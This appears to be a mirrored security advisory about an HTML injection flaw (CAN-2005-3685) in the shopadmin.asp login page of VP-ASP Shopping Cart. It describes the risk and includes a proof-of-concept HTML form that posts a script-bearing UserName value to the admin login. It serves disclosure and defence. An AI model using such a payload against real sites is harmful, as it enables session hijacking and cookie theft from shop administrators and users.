VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
TITLE: VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
CLASS: Input Validation Error
CVE: CAN-2005-3685
REMOTE: Yes
LOCAL: No
PUBLISHED: Nov 17 2005 12:00AM
UPDATE: Nov 17 2005 12:00AM
CREDIT: ConcorDHacK is credited with the discovery of this vulnerability.
VULNERABLE:
VP-ASP Shopping CartNOT VULNERABLE:
Vai alla pagina originale su Security Focus
Discussion
VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content.
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
Exploit
No exploit is required.
Proof of concept code has been provided:
<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.
References
References:
- VP-ASP Shopping Cart Cross Scripting vulnérability (ConcorDHacK)